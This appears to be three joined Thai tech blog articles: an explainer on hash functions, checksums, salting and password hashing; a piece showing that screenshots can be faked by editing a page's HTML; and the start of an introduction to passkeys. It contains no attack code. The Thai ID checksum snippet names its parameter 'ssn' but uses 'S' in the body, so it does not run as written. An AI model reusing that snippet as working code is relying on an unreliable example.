# Hash: ไม่รู้ว่ามันคืออะไรแต่มันใช่ ในกระบวนการรักษาความปลอดภัยคอมพิวเตอร์ นอกเหนือจากการดูแลระบบให้ควบคุมสิ่งที่ผู้ใช้หรือผู้บุกรุกให้ไม่สามารถทำงานใดๆ นอกเหนือจากที่กำหนดไว้ กระบวนการเข้ารหัส (Cryptography) นับเป็นสิ่งสำคัญที่ช่วยให้กระบวนการควบคุมนั้นเป็นไปได้จริง กระบวนการเข้ารหัสทุกวันนี้มักสร้างจากตัวประกอบสามตัวหลักได้แก่ ฟังก์ชั่นแฮช, การเข้ารหัสแบบกุญแจสมมาตร (symmetric key), และการเข้ารหัสแบบกุญแจอสมมาตร (asymmetric key) ในตอนแรกจะพูดถึงฟังก์ชั่นแฮชก่อน ฟังก์ชั่นแฮชนั้นโดยทั่วไปมันคือฟังก์ชั่นที่คืนค่าที่ "ความยาวคงที่" จากข้อมูลที่ความยาวเท่าใดก็ได้ อย่างเช่นที่เราเรียนในวิชาอัลกอริทึมอาจจะใช้ `n mod C` เพื่อหาค่าแฮชของข้อมูลใดๆ สมมติให้ n ใหญ่ได้ไม่จำกัดและเราต้องไม่ลืมว่าข้อมูลในคอมพิวเตอร์นั้นไม่ว่าจะเป็นข้อมูลใดๆ สุดท้ายแล้วเราสามารถมองข้อมูลเหล่านั้นเป็นตัวเลขจำนวนหนึ่ง (ที่อาจจะมีหลักนับพันล้านหลัก) ผลสุดท้ายค่าแฮชของข้อมูลจะใหญ่ไม่เกินค่า C แม้เราอาจจะสร้างฟังก์ชั่นแฮชได้ไม่ยากนัก แต่ฟังก์ชั่นแฮชแต่ละฟังก์ชั่นนั้นมีความดีแย่ต่างกันไป จุดสำคัญที่สุดของฟังก์ชั่นแฮช คือ การชนกันของค่าแฮช (collision) ที่ข้อมูลสองชุดกลับมีค่าแฮชตรงกัน เช่น หากเราใช้ฟังก์ชั่นง่ายๆ อย่าง `hash(n) = n mod 5` ทุกค่า n ที่ลงท้ายด้วย 5 ก็จะได้ค่าแฮชเป็น 0 เท่ากันทั้งหมด การใช้งานค่าแฮชที่นักเรียนสายคอมพิวเตอร์ทุกคนต้องเรียนกันคือใช้สร้างตารางแฮช ### Checksum: เพื่อความถูกต้องของข้อมูล ฟังก์ชั่นแฮชมีประโยชน์การใช้งานแรกๆ คือการตรวจสอบความถูกต้องของข้อมูล จากความผิดพลาดต่างๆ เช่น ความไม่น่าเชื่อถือของฮาร์ดแวร์, ความผิดพลาดของมนุษย์, หรือจากความเสียจากความผิดพลาดของเครือข่าย ค่าเหล่านี้เรามักเรียกในการใช้งานว่าค่า checksum ภายในระบบแรมในคอมพิวเตอร์ทั่วไป จะมีการตรวจค่าความถูกต้องข้อมูลในแรมที่เรียกว่า parity bit ได้จากการบวกค่าของทุกหลักในทุกไบต์เข้าด้วยกัน `parity = (bit(0) + bit(1) + bit(2) + bit(3) + bit(4) + bit(5) + bit(6) + bit(7)) mod 2` หากข้อมูลมีความผิดพลาด เช่นแรมเสียหาย เมื่ออ่านค่ากลับขึ้นมาค่าที่ได้จะมีโอกาสไม่ตรงกับค่าใน parity bit อยู่ 50% และหากเจอกรณีเช่นนั้นคอมพิวเตอร์ก็จะหยุดทำงาน แรมรุ่นใหม่ๆ อาจจะไม่ใช้เทคนิคนี้แล้วเนื่องจากต้นทุน, พลังงาน, และความเชื่อถือของแรมรุ่นใหม่ๆ ก็สูงขึ้นมากแต่แผงแรมในคอมพิวเตอร์รุ่นเก่าจะมีชิปแรมอยู่ 9 ตัวด้วยเหตุผลนี้ ภายในบัตรประชาชนไทย มีจำนวน 13 หลัก แต่ในความจริงแล้วมีความหมายเพียง 12 หลักเท่านั้นโดยหลักที่ 13 เป็นค่า checksum เราสามารถใส่เลข 12 หลักของบัตรประชาชนใดๆ แล้วหาค่าหลักที่ 13 ได้ def checksum(ssn): return (11 - (sum(\[int(s)*(len(S)-i+1) for (s,i) in zip(S,range(len(S)))\]) % 11)) % 10 กระบวนการนี้ทำให้โอกาสที่ผิดพลาดจากการกรอกหมายเลขด้วยมือลดลงไปอย่างมาก โดยค่าที่ได้นั้นเป็น 0-9 การกรอกผิดจะผ่านการตรวจสอบได้ต่อเมื่อกรอกผิดแล้วได้ค่า checksum ตรงกันพอดี ค่า checksum ที่มีค่าที่เป็นไปได้เพียงหนึ่งหลักหรือกระทั่งหนึ่งบิตอาจจะดูสามารถชนกับค่าอื่นๆ นี่นำมาคำนวณได้โดยง่าย เราอาจจะพบว่าในการกรอกเลขบัตรประชาชนนับล้านๆ ครั้ง อาจจะมีครั้งที่ผิดในหลักพันครั้ง แม้ค่า checksum จะช่วยลดความผิดพลาดนี้แต่ก็ยังคงเหลือความผิดพลาดโดยบังเอิญได้ ฟังก์ชั่น checksum ช่วงหลังจึงมีการพัฒนาให้สามารถคำนวณค่าและได้ผลลัพธ์ที่กำหนดได้ว่าต้องการผลลัพธ์ (ที่ความยาวจำกัด) เป็นความยาวเท่าใด ที่นิยมใช้กันมากในช่วงหนึ่งคือ [CRC](https://en.wikipedia.org/wiki/Cyclic_redundancy_check)-32 ที่จริงแล้ว CRC เป็นเพียงการกำหนดกระบวนการคำนวณไว้กว้างๆ เท่านั้น แต่ความยาวของค่าที่ได้มักกำหนดเป็น 32 บิต จึงเรียกว่า CRC-32 CRC-32 สามารถคำนวณค่า checksum เพื่อยืนยันความถูกต้องของข้อความได้เป็นอย่างดี ด้วยความยาวถึง 32 บิตทำให้มีความเป็นไปได้ 4 พันล้านรูปแบบ มันถูกใช้ตรวจสอบความถูกต้องของข้อมูลอย่างกว้างขวาง ทั้งในระบบแลนที่มีการแนบค่า CRC-32 ไปท้ายแพ็กเก็ตเพื่อให้ฝั่งรับสามารถตรวจสอบได้ว่าข้อมูลทั้งหมดที่ได้รับมาถูกต้องหรือไม่ การส่งไฟล์ขนาดใหญ่ที่อาจจะมีข้อผิดพลาดก็สามารถป้องกันได้ด้วยการส่งค่า CRC-32 ไปให้ผู้รับก่อน เมื่อผู้รับได้รับแล้วจึงรันคำสั่ง crc32 (ลินุกซ์ส่วนมากยังติดตั้งคำสั่งนี้เป็นมาตรฐาน สามารถเล่นดูได้) เพื่อคำนวณค่าของไฟล์ที่ดาวน์โหลดมา หากถูกต้องตรงกันก็แสดงว่าค่าที่ได้รับมานั้นถูกต้อง อย่างไรก็ดีฟังก์ชั่นในกลุ่ม checksum นั้นถูกออกแบบมาเพื่อให้ตรวจพบความผิดพลาดของข้อมูล **"โดยไม่ตั้งใจ"** และหากมีนักวิเคราะห์ทางคณิตศาสตร์มาหาทางคำนวณย้อนกลับ เพื่อหาข้อมูลที่จะคำนวณได้ค่า checksum ที่ตรงกันแล้วก็เป็นไปได้โดยง่าย ในโปรโตรคอล SSHv1 นั้นออกแบบโดยไม่ตระหนักถึงข้อจำกัดนี้ หลังจากที่ SSHv1 ออกมาในปี 1995 ก็ได้รับความนิยมอย่างสูง คอมพิวเตอร์และอุปกรณ์เครือข่ายจำนวนมากพากันใช้ SSHv1 ในการล็อกอินจากระยะไกลแทนโปรโตคอลเดิมๆ เช่น telnet โดยหวังว่ามันจะให้ความปลอดภัยที่ดีกว่า เพียงสามปีหลังจากออกโปรโตคอลก็เริ่มมีรายงานว่ามีคนสามารถแทรกคำสั่งใดๆ ลงไปในการเชื่อมต่อที่แอดมินกำลังเชื่อมต่ออยู่กับเครื่องเซิร์ฟเวอร์ และสามารถเข้าควบคุมเครื่องแทนได้ในที่สุด ([VU#13877](http://www.kb.cert.org/vuls/id/13877)) หลังจากนั้นไม่นาน ซอฟต์แวร์ SSH จากหลายบริษัทก็พยายามเพิ่มโค้ดตรวจสอบการโจมตีด้วยการปลอมแพ็กเก็ตของ SSH แต่ในปี 2001 ก็มีผู้พบว่าโค้ดดังกล่าวมีบั๊กจนทำให้แฮกเกอร์สามารถบุกเครื่องเซิร์ฟเวอร์ได้โดยไม่ต้องดักฟังการเชื่อมต่อแม้แต่น้อย ([VU#945216](https://www.kb.cert.org/vuls/id/945216)) นับเป็นจุดอวสานของ SSHv1 ที่ผู้ผลิตส่วนมากมักเลิกซัพพอร์ตโปรโตคอลไป และปิดไว้เป็นค่าตั้งต้น แต่บังคับให้ใช้ SSHv2 ที่แข็งแรงกว่าแทน อย่างไรก็ดี เรื่องนี้ทำให้เรามี The Matrix Reloaded ดูกัน (มองจอดีๆ) ### Cryptographic Hash ในค่า checksum นั้นเราอาจจะนิยามได้ว่ามันเป็นฟังก์ชั่นที่ให้ค่าที่ "ถ้าข้อมูลไม่ตรงกันแล้ว จะได้ค่าที่**บังเอิญ**ตรงกันได้ยาก" แต่ปัญหาคือแฮกเกอร์นั้นเป็นผู้จงใจอย่างยิ่งที่จะปลอมแปลงข้อมูล แม้ข้อมูลจะไม่เข้ารหัส แต่หลายกรณีความถูกต้องก็เป็นเรื่องสำคัญเป็นอย่างมาก เราอาจจะดาวน์โหลดไฟล์ซีดีของลินุกซ์สักตัวจากเซิร์ฟเวอร์ใดๆ ก็ได้ในโลก โดยเลือกเซิร์ฟเวอร์ที่ใกล้เรามากที่สุด เพื่อให้ได้ความเร็วสูงสุด แต่เราจะเชื่อได้อย่างไรว่าเจ้าของเซิร์ฟเวอร์นั้นไม่แอบแก้ไข ใส่มัลแวร์ ฯลฯ ลงไปในซีดีก่อนที่จะเปิดให้เราดาวน์โหลด ขณะที่ผู้ผลิตลินุกซ์มักมีทุนไม่มากนัก และจำนวนมากอยู่ด้วยเงินบริจาค ทางออกในเรื่องนี้คือการประกาศค่าแฮชของทุกไฟล์ที่ให้ดาวน์โหลดผ่านทางเว็บกลาง หลังจากนั้นแม้ใครจะดาวน์โหลดผ่านช่องทางใดๆ ก็สามารถทำได้ เมื่อตรวจสอบแล้วว่าค่าแฮชตรงก็สามารถใช้งานได้อย่างสบายใจ 16b0aa028e5a3d6374667e875044b762cb11eae7 *ubuntu-12.10-desktop-amd64+mac.iso 8618058554ffd11e317356ec25885bcb8c1d0b36 *ubuntu-12.10-desktop-amd64.iso 3e8a359ec2665c6ac9e48e8712655bf1d9bcf27f *ubuntu-12.10-desktop-armhf+omap4.img 799b761f1bbea635d7306a5632cbd54c8c27a10b *ubuntu-12.10-desktop-i386.iso 823b66c44fb620479ba43dacfc73d54cc8af65f6 *ubuntu-12.10-server-amd64+mac.iso e2a48af008ff3c4db6a8235151a1e90ea600fceb *ubuntu-12.10-server-amd64.iso ddc70bd3dacbc006eb8dc8cdc05fab008c5b07b9 *ubuntu-12.10-server-armhf+omap4.img e0e48be7ae21003cf0b25591d71d8cdbee7063e7 *ubuntu-12.10-server-i386.iso 5fa95a26aa416204b9229d07c0d389ea921036d5 *ubuntu-12.10-wubi-amd64.tar.xz b594ae9d40d0644293990b873dfccf50f80c942b *ubuntu-12.10-wubi-i386.tar.xz c4879ae4e706613bf2682bfd80ef8d429e107a4f *wubi.exe ตัวอย่างข้างต้นเป็นค่า SHA1 ของไฟล์ Ubuntu 12.10 ใครที่มีไฟล์และติดตั้งไปแล้วอาจจะลองรันคำสั่ง `sha1sum` เพื่อตรวจสอบซ้ำ (ถ้าไม่ตรงก็ขอให้โชคดี) คุณสมบัติความทนทานของฟังก์ชั่นแฮชในกลุ่มที่ทนทานต่อแฮกเกอร์ที่เรียกกันว่า cryptographic hash นี้ มีคุณสมบัติด้วยกัน 3 ประการ 1. ถ้ามีค่า hash(n) อยู่แล้ว แฮกเกอร์ต้องไม่สามารถหาค่า n ได้ภายในเวลาที่สมเหตุผล 2. ถ้ามีค่า n และ ้hash(n) อยู่แล้ว แฮกเกอร์ต้องไม่สามารถหาค่า m ที่ทำให้ค่า hash(m) == hash(n) ได้ภายในเวลาที่สมเหตุผล 3. แฮกเกอร์ไม่สามารถหาค่า n และ m ใดๆ ที่ทำให้ hash(n) == hash(m) ภายในเวลาที่สมเหตุสมผล ในกรณีของไฟล์ที่เปิดให้ดาวน์โหลด หากผู้ที่ดาวน์โหลดรู้อยู่ก่อนแล้วว่าค่าแฮชนั้นคือค่าอะไรก็สามารถตรวจสอบได้ว่าค่าของไฟล์ที่ดาวน์โหลดมานั้นตรงกันหรือไม่ หากแฮกเกอร์ต้องการปลอมไฟล์เพื่อให้ดาวน์โหลดไปใช้งาน จะต้องพยายามสร้างไฟล์ใหม่ขึ้นมาหลายๆ รูปแบบ ในกรณีของ SHA1 นั้นค่าแฮชที่ได้มีความยาว 160 บิต แฮกเกอร์อาจจะต้องสร้างไฟล์มากขึ้น 2<sup>160</sup> (ประมาณ 1.46 x 10<sup>48</sup>) แบบเพื่อให้ได้สักไฟล์หนึ่งที่มีค่าแฮชตรงกัน หากเป็นเช่นนี้แสดงว่าแฮกเกอร์ไม่สามารถทำได้ในเวลาที่สมเหตุสมผลผล ก่อนหน้านี้ฟังก์ชั่นที่ได้รับความนิยมเป็นอย่างมากคือ [MD5](https://en.wikipedia.org/wiki/MD5) เพราะมันทำงานได้เร็ว และมีประวัติความทนทานค่อนข้างดีมาก แต่ในช่วงสิบปีให้หลังมานี้ ความรู้ด้านการถอดรหัส (cryptanalysis) ของ MD5 ก็เริ่มถูกเผยแพร่มากขึ้นจนสามารถปลอมแปลงกันได้แม้จะใช้ต้นทุนและเวลาที่สูง แต่ใน[มัลแวร์ Flame ก็ใช้ช่องโหว่นี้ปลอมแปลงใบรับรองของทางไมโครซอฟท์](https://www.blognone.com/node/33196) จนกระทั่งมัลแวร์สามารถผ่านการตรวจสอบของวินโดวส์ไปได้ โดยตัว MD5 นั้นให้ค่าแฮชขนาด 128 บิต แม้จะต้องใช้เวลานับสิบปี (ซึ่งต่ำกว่าที่ออกแบบไว้เดิม) หากใช้คอมพิวเตอร์เครื่องเดียวในการสร้างใบรับรองในรูปแบบต่างๆ เพื่อให้ค่าแฮชตรงกันและสามารถปลอมแปลงได้ แต่หากแฮกเกอร์มีทุนมากพอก็สามารถซื้อคอมพิวเตอร์จำนวนมาก หรือเช่าเครื่อจาก Amazon EC2 นับพันๆ เครื่องเพื่อช่วยกันคำนวณภายในเวลาไม่กี่เดือน ฟังก์ชั่นแฮชในระดับที่ทนทานต่อการโจมตี ต้องการการทดสอบจากวงกว้างว่ามันทนทานได้จริง การที่ทีมวิจัยหนึ่งๆ ออกแบบฟังก์ชั่นแฮชที่ดูจะทนทานแต่ไม่ได้ถูกทดสอบมากพอ อาจจะทำให้พบช่องโหว่สำคัญได้ภายหลัง ทาง NIST (National Institute of Standards and Technology - NIST, เป็นหน่วยงานกำหนดมาตรฐานภายใต้กระทรวงพานิชของสหรัฐฯ) ก็จัดแข่งขันมาตรฐาน SHA (Secure Hash Algorithm) เคยเป็นหน่วยงานที่ออกฟังก์ชั่นแฮชมาตรฐานสำหรับหน่วยงานต่างๆ ของสหรัฐ โดยตอนแรกออกมาเป็นฟังก์ชั่น SHA และถูกเจาะ (พบวิธีการสร้างค่าที่ให้ค่าแฮชตรงกัน) ในเวลาไม่นาน จนต้องแก้ไขเป็น SHA1 (ตัวแรกเลยได้ชื่อว่า SHA0) ที่ได้รับการยอมรับอย่างกว้างขวาง และใช้ในใบรับรองการเข้ารหัสเว็บส่วนใหญ่ทุกวันนี้ SHA1 เองก็เริ่มมีแนวโน้มว่าอาจจะไม่แข็งแกร่งนัก ทาง NIST แนะนำให้หน่วยงานรัฐทั้งหมดย้ายไปใช้ SHA2 หลังจากปี 2010 และเพื่อสร้างมาตรฐานที่ทนทานในระยะยาวก็จัดแข่ง SHA3 จากทีมวิจัยหลายทีม และ[เพิ่งได้ผู้ชนะเมื่อปลายปีที่แล้ว](https://www.blognone.com/node/36692) นอกจากการใช้แฮชเพื่อตรวจสอบความถูกต้องของข้อมูลแล้ว หน้าที่สำคัญของแฮชคือการ "ปิดบัง" ว่าข้อมูลนั้นที่จริงแล้วเป็นอะไร กรณีที่ใช้กันมาก เช่น การปิดบังรหัสผ่าน, หรือการปิดบังข้อมูลความลับ ในระบบ 2-factor authentication ของกูเกิลนั้นเมื่อเปิดโปรแกรมครั้งแรกโปรแกรมจะขอให้ผ่านบาร์โค้ดบนหน้าจอ บาร์โค้ดนั้นคือ "ความลับ" ที่เรากับกูเกิลรู้ร่วมกัน แต่ในกรณีของรหัสผ่าน เราต้องส่งความลับให้กูเกิลทุกครั้งที่ต้องการเข้าใช้บริการ แต่หากเราใช้ฟังก์ชั่นแฮช เมื่อเราแชร์ความลับนี้ร่วมกับกูเกิลแล้ว กระบวนการคือใช้ค่า "เวลา" ไปเชื่อมกับความลับ เช่น หากกูเกิลกำหนดความลับระหว่างเรากับเว็บเป็น "14048a9a" ทุกๆ นาที ฟังก์ชั่นภายในจะแฮชค่าจากนาฬิกา กลายเป็นค่าแฮช HASH("14048a9a"+"Apr 25 05:03:03 ICT 2013") เมื่อเราส่งค่าแฮชนี้ไปยังกูเกิล กูเกิลที่รู้ความลับภายในเช่นเดียวกันจะสามารถใช้นาฬิกาในเครื่องตัวเองคำนวณเวลาออกมาได้แบบเดียวกัน กระบวนการจึงพิสูจน์ตัวตนได้โดยไม่ต้องส่งความลับถึงกันแม้แต่น้อย กระบวนการนี้มีการใช้งานมานานในโลกองค์กร บริษัทขนาดใหญ่จำนวนมากมี "พวงกุญแจ" พิเศษที่มีตัวเลขแสดงและเปลี่ยนไปทุกนาที หลักการก็ยังคงเดิมคือภายในพวงกุญแจเหล่านี้มีค่าความลับที่ไม่ต้องการเปิดเผยอยู่ภายในและแชร์ร่วมกันกับเซิร์ฟเวอร์ และใช้ค่าเวลาปัจจุบันในการคำนวณตัวเลข ### Password Hash รหัสผ่านนั้นเป็นข้อมูลที่ต้องถูกปิดบังแม้แต่ผู้ดูแลระบบเองรวมถึงหลายครั้งข้อมูลถูกแบ็กอัพเก็บเอาไว้ ผู้ใช้อาจจะใช้รหัสผ่านเดียวกันในหลายบริการ (ซึ่งเป็นนิสัยที่อันตรายต่อความปลอดภัย แต่ผู้ใช้จำนวนมากก็ทำเช่นนี้) ในกรณีสุดวิสัย ฐานข้อมูลรหัสผ่านอาจจะรั่วไหลไปยังแฮกเกอร์ที่เราพบกันได้บ่อยครั้ง การแฮชรหัสผ่านก่อนที่จะเก็บจึงช่วยแก้ปัญหานี้ ข้อมูลที่เก็บอยู่บนเซิร์ฟเวอร์จะเป็นเพียงค่าแฮชที่ไม่ (ควร) มีใครรู้ว่าค่าตั้งต้นของมันเป็นอะไร เช่น บางครั้งแฮกเกอร์ก็เป็นผู้ดูแลระบบหรือผู้ดำเนินการแบ็กอัพเสียเอง หากคนเหล่านี้สามารถรู้ได้ว่ารหัสผ่านคืออะไร พวกเขาอาจจะออกไปล็อกอินบริการผ่านช่องทางปกติ แล้วใช้รหัสผ่านของลูกค้าเพื่อเข้าสู่ระบบได้โดยง่าย เว็บเฟรมเวิร์คสมัยใหม่จะเก็บรหัสผ่านผู้ใช้เป็นค่าที่แฮชแล้วทั้งหมด เป็นเหตุผลให้เมื่อผู้ใช้ลืมรหัสผ่าน เว็บจะไม่สามารถส่งรหัสผ่านเดิมกลับไปยังผู้ใช้ได้เลย (เพราะไม่มีใครรู้รหัสแล้ว) กระบวนการเดียวที่ทำได้คือการส่งลิงก์ที่เป็นลิงก์สร้างขึ้นเฉพาะ (มักต่อท้ายด้วยสตริงสุ่มยาวๆ ให้เดาไม่ได้) แล้วให้ผู้ใช้กดเข้ามาเปลี่ยนรหัสผ่านได้เท่านั้น แม้ว่าฟังก์ชั่นแฮชจะทนทานต่อการย้อนกลับหาค่าตั้งต้น แต่พลังของคอมพิวเตอร์ทุกวันนี้กลับสูงมากจนกระทั่งเป็นไปได้ที่จะเก็บค่าความเป็นไปได้ทุกกรณีของแฮช เมื่อเราเห็นค่าแฮชสักค่าหนึ่ง เราอาจจะค้นหามันได้ทั่วไปว่าที่จริงแล้วมันเป็นค่าอะไร เช่น ค่า [bf072e9119077b4e76437a93986787ef](https://encrypted.google.com/search?q=bf072e9119077b4e76437a93986787ef) ยิ่งหากผู้ใช้ใช้รหัสผ่านที่ใช้กันบ่อย โอกาสที่จะพบค่าแฮชที่ตรงกันทำให้รู้รหัสผ่านเริ่มต้นก็มากขึ้น กระบวนการหลีกเลี่ยงค่าแฮชของค่าที่พบบ่อย ทำให้มีข้อเสนอการเติมค่าเข้าไปอีกชุดหนึ่งก่อนแฮชเพื่อให้ค่าเปลี่ยนไป โดยค่านี้อาจจะเก็บเป็นความลับระหว่างผู้ที่เข้าถึงฐานข้อมูลของรหัสผ่าน โดยเติมค่าที่สุ่มมาอีกชุดหนึ่งต่อท้ายข้อมูลที่จะแฮช ทำให้ค่าแฮชที่ได้ไม่ตรงกับค่าแฮชทั่วไปที่ใช้งานกัน เช่น หากต้องการเก็บค่าแฮช SHA1 ของรหัสผ่าน "1234" แทนที่จะแฮชค่า "1234" โดยตรงซึ่งจะให้ค่าแฮช "1be168ff837f043bde17c0314341c84271047b31" ก็ให้สร้างอักษรสุ่ม เช่น "A1d944" เข้ามาต่อท้ายทำให้ค่าเปลี่ยนไปเป็น "14048a9ac614bd653defca9e63db28d1377c0df4" เมื่อต้องการเทียบค่าอีกครั้ง ไม่ว่าผู้ใช้จะใส่ค่าอะไรเป็นรหัสผ่านก็ให้นำสตริง "A1d944" เข้าไปต่อท้ายทุกครั้ง เรียกกระบวนการนี้ว่า Salt นอกจากการปิดบังรหัสผ่านแล้ว ยังมีกรณีที่ต้องการปิดบัง เช่น มาตรฐานการเก็บหมายเลขบัตรเครดิตนั้น ไม่ควรเก็บหมายเลขบัตรเครดิตไว้โดยตรงในฐานข้อมูล แต่ให้เก็บค่าแฮช (ที่อาจจะไม่ต้อง Salt) เพื่อใช้ยืนยันว่าผู้ใส่หมายเลขบัตรเครดิตนั้นเป็นลูกค้าที่ใช้บริการร้านค้าอยู่หรือไม่ และใช้หมายเลขที่ลูกค้าเพิ่งใส่มาในการยืนยันไปยังธนาคารเพื่อตัดเงิน การทำเช่นนี้ในกรณีที่ร้านค้าถูกแฮกก็ยังไม่ทำให้หมายเลขบัตรเครดิตของลูกค้าถูกเปิดเผย แต่ปัญหาของฟังก์ชั่นแฮชยังคงมีประเด็นใหม่ๆ ฮาร์ดแวร์ปัจจุบันได้รับการปรับปรุงอย่างรวดเร็ว ชิปจำนวนมากถูกเพิ่มชุดคำสั่งพิเศษเพื่อเร่งความเร็วในการคำนวณแฮช ทำให้การคำนวณค่าแฮชทำได้เร็วขึ้นเรื่อยๆ ปัญหาความปลอดภัยเกิดขึ้นเมื่อการคำนวณค่าแฮชทำได้อย่างรวดเร็ว ทุกวันนี้การตั้งรหัสผ่านของคนเรามักจำกัดอยู่ที่ไม่เกิน 8 ตัวอักษร ซึ่งหากใช้ตัวอักษรเล็กภาษาอังกฤษทั้งหมดก็จะมีความเป็นไปได้เพียงสองแสนล้านกรณีเท่านั้น ฮาร์ดแวร์ความเร็วสูงและการใช้บริการกลุ่มเมฆทำให้การคำนวณค่าแฮชใหม่ทั้งหมดสำหรับความเป็นไปได้เพียงเท่านี้สามารถทำได้ในเวลาอันสั้น หรือแม้แต่การจำคำสุ่มในภาษาอังกฤษสี่คำ ก็ยังมีความเป็นไปได้เพียง 4.5 ล้านล้านกรณี ในกรณี เราไม่สามารถเพิ่มความยาวรหัสผ่านไปเรื่อยๆ เพื่อให้มีความเป็นไปได้สูงพอที่แฮกเกอร์จะไม่สามารถไล่คำนวณรหัสผ่านใหม่ทั้งหมดได้ กระบวนการที่พอช่วยได้คือการสร้างฟังก์ชั่นแฮชรูปแบบใหม่ที่ "ช้า" ฟังก์ชั่นทั่วไปอาจจะคำนวณสำเร็จภายในเวลาระดับไมโครวินาที แต่ฟังก์ชั่นแฮชสำหรับรหัสผ่านจะใช้เวลามากกว่านั้นนับพันหรือนับหมื่นเท่า หากใช้สำหรับคำนวณรหัสผ่านผู้ใช้ที่ป้อนรหัสก็มักไม่ส่งผลทำให้การให้บริการช้าลงนัก แต่หากแฮกเกอร์จะไล่รหัสผ่านที่เป็นไปได้ทุกกรณี การช้าลงนับพันเท่าจะทำให้แฮกเกอร์คำนวณทุกค่าที่เป็นไปได้ได้ยากขึ้นมาก (หากออกแบบแข็งแรงพอ น่าจะไม่สามารถทำได้ในช่วงชีวิต) ฟังก์ชั่นเหล่านี้ได้แก่ bcrypt ที่ช้าโดยกระบวนวิธีภายในเองแม้จะช้าแต่แฮกเกอร์ในยุคหลังก็สามารถสร้างฮาร์ดแวร์ผ่านชิป FPGA เพื่อเร่งความเร็วได้ดีขึ้นเรื่อยๆ,มาตรฐานการแฮชที่ช้าที่เป็นมาตรฐานคือ PBKDF2 (แบบเดียวกับที่ [1Password ใช้](https://www.blognone.com/node/43443)) โดยกระบวนการแล้วมันคือการคำนวณค่าแฮชด้วยฟังก์ชั่นที่ระบุ โดยสามารถระบุได้เป็นทั้ง SHA1 และ MD5 แล้วคำนวณซ้ำๆ ไปตามจำนวนรอบที่กำหนด โดยแนะนำไม่ต่ำกว่า 1000 รอบ ข้อเสนอใหม่เช่น scrypt สร้างฟังก์ชั่นที่ช้าและต้องการหน่วยความจำสูง ทำให้สร้างฮาร์ดแวร์มาเร่งความเร็วได้ลำบาก (เพราะหน่วยความจำในชิปจะกินพื้นที่สูงมาก) ### ส่งท้าย กระบวนการแฮชนับเป็นกระบวนการขั้นต้นของการเข้าสู่โลกของการเข้ารหัส บทความนี้แสดงถึงรูปแบบการใช้งานของฟังก์ชั่นแต่ละประเภท และแนะนำถึงคุณสมบัติ สิ่งเหล่านี้หลายครั้งเราใช้งานอยู่โดยไม่ทันได้ตระหนักว่าการใช้งานมีอยู่รอบตัวเราและมีอยู่ตลอดเวลา หากเราต้องออกแบบระบบความปลอดภัย การระมัดระวังถึงคุณสมบัติของฟังก์ชั่นแต่ละรูปแบบนับเป็นเรื่องสำคัญ
# Screenshot ไม่ใช่หลักฐาน เมื่อตอนเย็นผมเริ่มเห็นทวีตข้อความรูปแบบหนึ่งจำนวนมาก คือการเชิญชวนให้แจ้งเบาะแสข้อความหมิ่นไปยัง DSI ด้วยการจับหน้าจอ เช่นข้อความของคุณเจ เจตริน (หลังเบรก) ในฐานะคนไอทีขอใช้พื้นที่นีชี้แจงว่า ภาพหน้าจอไม่ใช่สิ่งที่จะสามารถเป็นหลักฐานใดๆ ได้ครับ ผมยกตัวอย่างของคุณ @moui ที่ถูกผมปลอมแปลงข้อความ ลงใน screenshot ด้านล่างนี้ กระบวนการใช้เวลาไม่ถึงหนึ่งนาที ข้อความด้านบนสุดของคุณหมวยไม่ใช่ข้อความที่คุณหมวยพิมพ์เองแต่อย่างใดแต่เป็นข้อความที่ผมแต่งเติมเข้าไป จุดสำคัญอยู่ที่นี่ "ไม่ใช่" การตกแต่งภาพ ทำให้ภาพนี้ไร้พิรุธทุกประการ ต่างจากภาพตกแต่งจากซอฟต์แวร์เช่น Photoshop ที่มักหลงเหลือร่องรอยไว้ให้พิสูจน์ได้บ้างหากผู้กระทำไม่เชี่ยวชาญเพียงพอ แต่ความเป็นจริงคือ HTML ไม่ใช่ไฟล์ที่มีการปิดบังข้อมูลภายใน ทุกคนสามารถเปิดไฟล์ เซฟไฟล์ และแก้ไขมันในเครื่องตัวเองได้ ความสะดวกในการแก้ไข HTML ทำได้ง่ายมากผ่านทางซอฟต์แวร์ดีบั๊กเว็บเช่น Firebug ยิ่ง Chrome และ Webkit นั้นยิ่งมีระบบแก้ไขหน้าเว็บมาให้ในตัวเบราเซอร์ด้วยซ้ำ ผมหวังว่าบทความนี้จะช่วยสร้างความเข้าใจให้กับผู้อ่าน Blognone ที่อาจจะพบกับกระแสการแสดงภาพหน้าจอที่เพิ่มขึ้น หรือให้ดีกว่านั้นเจ้าหน้าที่ที่เกี่ยวข้องจะเข้าใจว่าการได้รับภาพหน้าจอนั้นแทบไม่มีความน่าเชื่อถือใดๆ มากไปกว่าการชี้เบาะแสแบบปากเปล่าเลยแม้แต่น้อย
# Passkey อนาคตแห่งการล็อกอินไร้รหัสผ่าน ช่วงสองสามปีที่ผ่านมาปัญหาบัญชีถูกแฮกยังคงเป็นปัญหาใหญ่ของระบบความปลอดภัยจำนวนมาก แม้บริการต่างๆ จะพยายามต่อสู้กับการโจมตีบัญชีผู้ใช้ช่องทางต่างๆ ทั้งการเปิดการล็อกอินสองขั้นตอน หรือการตั้งกฎรหัสผ่านให้ยากขึ้นเรื่อยๆ แม้ว่า NIST จะบอกให้เลิกตั้งกฎไปแล้ว ขอแค่อย่าใช้รหัสที่เคยหลุดมาแล้วก็พอก็ตามที แต่ผลสุดท้ายเรายังเห็นผู้ใช้ตั้งรหัสผ่านซ้ำกันไปมา ไม่ยอมเปิดใช้ฟีเจอร์ล็อกอินสองขั้นตอนหากไม่ใช่บัญชีองค์กรที่บังคับ หรือหากบังคับก็จะเลือกช่องทางที่สะดวกที่สุด เช่น SMS แต่ปลอดภัยน้อยที่สุด ปัญหาของรหัสผ่านนั้นมีสองประเด็นใหญ่ ข้อแรกคือคนร้ายอาจจะล่วงรู้รหัสผ่านไม่ว่าด้วยวิธีการใดก็ตาม เช่น ผู้ใช้ตั้งรหัสผ่านที่เดาได้ง่าย หรือผู้ใช้ตั้งรหัสผ่านที่ซ้ำกันไปทั้งหมด ทำให้เมื่อเจาะรหัสผ่านจากบริการใดๆ ก็เข้าใช้บริการอื่นๆ ได้ทันที ข้อที่สองคือคนร้ายอาจจะหลอกล่อให้ผู้ใช้ใส่รหัสผ่านกับเว็บปลอม, แอปปลอม, หรือแม้กระทั่งหลอกให้เหยื่อบอกทางโทรศัพท์หรือแชทเอาตรงๆ โดยปลอมตัวว่าเป็นเจ้าหน้าที่ที่เกี่ยวข้อง การเปิดใช้งานการล็อกอินหลายขั้นตอน (multi-factor authentication - MFA) นั้นสามารถช่วยตัดวงการโจมตีแบบแรกไปได้ 